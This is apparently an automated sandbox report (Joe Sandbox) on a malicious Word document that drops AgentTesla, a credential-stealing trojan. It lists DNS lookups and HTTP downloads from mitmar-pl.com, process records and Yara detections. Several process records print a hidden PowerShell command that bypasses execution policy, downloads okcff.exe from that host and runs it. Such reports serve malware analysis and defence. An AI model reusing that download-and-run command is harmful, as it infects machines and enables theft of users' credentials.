Jan 14, 2022 10:23:27.011117935 CET | 53 | 59030 | 8.8.8.8 | 192.168.2.22

                                                          DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 14, 2022 10:23:17.920835972 CET | 192.168.2.22 | 8.8.8.8 | 0xf90 | Standard query (0) | mitmar-pl.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:23:22.426112890 CET | 192.168.2.22 | 8.8.8.8 | 0x8b50 | Standard query (0) | mitmar-pl.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:23:23.372718096 CET | 192.168.2.22 | 8.8.8.8 | 0x8fde | Standard query (0) | mitmar-pl.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:23:26.991931915 CET | 192.168.2.22 | 8.8.8.8 | 0x11d5 | Standard query (0) | mitmar-pl.com | A (IP address) | IN (0x0001)

                                                          DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 14, 2022 10:23:17.952476025 CET | 8.8.8.8 | 192.168.2.22 | 0xf90 | No error (0) | mitmar-pl.com |  | 37.0.9.166 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:23:22.446824074 CET | 8.8.8.8 | 192.168.2.22 | 0x8b50 | No error (0) | mitmar-pl.com |  | 37.0.9.166 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:23:23.440036058 CET | 8.8.8.8 | 192.168.2.22 | 0x8fde | No error (0) | mitmar-pl.com |  | 37.0.9.166 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:23:27.011117935 CET | 8.8.8.8 | 192.168.2.22 | 0x11d5 | No error (0) | mitmar-pl.com |  | 37.0.9.166 | A (IP address) | IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • mitmar-pl.com

                                                          HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 37.0.9.166 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp: Jan 14, 2022 10:23:17.996404886 CET
kBytes transferred: 0
Direction: OUT
Data:
GET /okcff.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: mitmar-pl.com
Connection: Keep-Alive

Timestamp: Jan 14, 2022 10:23:18.024344921 CET
kBytes transferred: 2
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 14 Jan 2022 09:23:18 GMT
Content-Type: application/x-msdownload
Content-Length: 194560
Last-Modified: Fri, 14 Jan 2022 05:56:32 GMT
Connection: keep-alive
ETag: "61e11090-2f800"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 37.0.9.166 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp: Jan 14, 2022 10:23:22.518182993 CET
kBytes transferred: 206
Direction: OUT
Data:
GET /okcff.exe HTTP/1.1
Host: mitmar-pl.com
Connection: Keep-Alive

Timestamp: Jan 14, 2022 10:23:22.545969963 CET
kBytes transferred: 207
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 14 Jan 2022 09:23:22 GMT
Content-Type: application/x-msdownload
Content-Length: 194560
Last-Modified: Fri, 14 Jan 2022 05:56:32 GMT
Connection: keep-alive
ETag: "61e11090-2f800"
Accept-Ranges: bytes


                                                          Session ID: 2
                                                          Source IP: 192.168.2.22
                                                          Source Port: 49169
                                                          Destination IP: 37.0.9.166
                                                          Destination Port: 80
                                                          Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

                                                          Timestamp: Jan 14, 2022 10:23:23.479233027 CET
                                                          kBytes transferred: 408
                                                          Direction: OUT
                                                          Data:
                                                          GET /okcff.exe HTTP/1.1
                                                          Host: mitmar-pl.com
                                                          Connection: Keep-Alive

                                                          Timestamp: Jan 14, 2022 10:23:23.507251978 CET
                                                          kBytes transferred: 410
                                                          Direction: IN
                                                          Data:
                                                          HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 14 Jan 2022 09:23:23 GMT
                                                          Content-Type: application/x-msdownload
                                                          Content-Length: 194560
                                                          Last-Modified: Fri, 14 Jan 2022 05:56:32 GMT
                                                          Connection: keep-alive
                                                          ETag: "61e11090-2f800"
                                                          Accept-Ranges: bytes


                                                          Session ID: 3
                                                          Source IP: 192.168.2.22
                                                          Source Port: 49170
                                                          Destination IP: 37.0.9.166
                                                          Destination Port: 80
                                                          Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

                                                          Timestamp: Jan 14, 2022 10:23:27.105874062 CET
                                                          kBytes transferred: 612
                                                          Direction: OUT
                                                          Data:
                                                          GET /Crkrqdrd.jpeg HTTP/1.1
                                                          Host: mitmar-pl.com
                                                          Connection: Keep-Alive

                                                          Timestamp: Jan 14, 2022 10:23:27.134126902 CET
                                                          kBytes transferred: 614
                                                          Direction: IN
                                                          Data:
                                                          HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 14 Jan 2022 09:23:27 GMT
                                                          Content-Type: image/jpeg
                                                          Content-Length: 519680
                                                          Last-Modified: Fri, 14 Jan 2022 05:40:37 GMT
                                                          Connection: keep-alive
                                                          ETag: "61e10cd5-7ee00"
                                                          Accept-Ranges: bytes


                                                          System Behavior

                                                          General

                                                          Start time:10:22:23
                                                          Start date:14/01/2022
                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                          Imagebase:0x13f6b0000
                                                          File size:1423704 bytes
                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:10:22:27
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                                                          Imagebase:0x13f9e0000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.436663453.0000000000380000.00000004.00000020.sdmp, Author: Florian Roth
                                                          Reputation:high

                                                          General

                                                          Start time:10:22:29
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                                                          Imagebase:0x13f9e0000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000005.00000002.438152998.00000000003A0000.00000004.00000020.sdmp, Author: Florian Roth
                                                          Reputation:high

                                                          General

                                                          Start time:10:22:29
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                                                          Imagebase:0x13f9e0000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Start time:10:22:34
                                                          Start date:14/01/2022
                                                          Path:C:\Users\user\AppData\Roaming\okcff.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Roaming\okcff.exe"
                                                          Imagebase:0x9f0000
                                                          File size:194560 bytes
                                                          MD5 hash:E9416A322E9A796D45588BC4FB04CD45
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.623662053.000000000356F000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.621443805.00000000023AD000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.621033509.0000000001E30000.00000004.00020000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low

                                                          General

                                                          Start time:10:22:37
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a190000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:10:22:37
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x9f0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:10:22:41
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a6d0000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:10:22:42
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x2e0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:10:22:44
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a270000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:45
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x6e0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:47
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a030000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:48
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\verclsid.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                                                          Imagebase:0xff0a0000
                                                          File size:11776 bytes
                                                          MD5 hash:3796AE13F680D9239210513EDA590E86
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:48
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0xf0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:50
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\notepad.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                                                          Imagebase:0xff910000
                                                          File size:193536 bytes
                                                          MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:51
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a7b0000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:52
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x6b0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:54
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a2a0000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:55
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x4e0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:59
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4ac50000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:23:00
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0xae0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:23:04
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a970000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:23:05
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0xe80000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:23:09
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a700000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:23:10
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x4f0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:23:54
                                                          Start date:14/01/2022
                                                          Path:C:\Users\user\AppData\Roaming\okcff.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\okcff.exe
                                                          Imagebase:0x9f0000
                                                          File size:194560 bytes
                                                          MD5 hash:E9416A322E9A796D45588BC4FB04CD45
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                          Disassembly

                                                          Code Analysis


                                                            Executed Functions

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.445609977.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ff00250000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.445609977.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ff00250000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Executed Functions

                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.447776016.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff00250000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Execution Graph

                                                            Execution Coverage:16.3%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:1.3%
                                                            Total number of Nodes:223
                                                            Total number of Limit Nodes:9

                                                            Graph


                                                            Executed Functions

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll$.@ll$>Kll$fCll
                                                            • API String ID: 0-1454501470
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $.@ll$.@ll
                                                            • API String ID: 0-1918450220
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Djo$mo
                                                            • API String ID: 0-3939666776
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Djo$mo
                                                            • API String ID: 0-3939666776
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4
                                                            • API String ID: 0-4088798008
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • EnumChildWindows.USER32(?,?,?), ref: 021AC8AF
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumWindows
                                                            • String ID:
                                                            • API String ID: 3555792229-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll
                                                            • API String ID: 0-3231272322
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4
                                                            • API String ID: 0-4088798008
                                                            • Opcode ID: 7b629a693fe726059cdabd3b1765e3fa00311439dd500fc9bbbcb206673287b4
                                                            • Instruction ID: 01be07b45be324666bc78f6217878369dae1084299aa950fa50da1a038be6bf1
                                                            • Opcode Fuzzy Hash: 7b629a693fe726059cdabd3b1765e3fa00311439dd500fc9bbbcb206673287b4
                                                            • Instruction Fuzzy Hash: 8C320634A40214DFDB24EF64C984BADB7B2FF48304F5684A9D90AAB264DB31ED85CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 041284c7211833070d9c4a717b2daa730a9f84d29ec2ca09b243bbcf57cea405
                                                            • Instruction ID: 5f5d9980d03ba0683e64833065646fb07380dd7a9c03082f85feeabf85de688d
                                                            • Opcode Fuzzy Hash: 041284c7211833070d9c4a717b2daa730a9f84d29ec2ca09b243bbcf57cea405
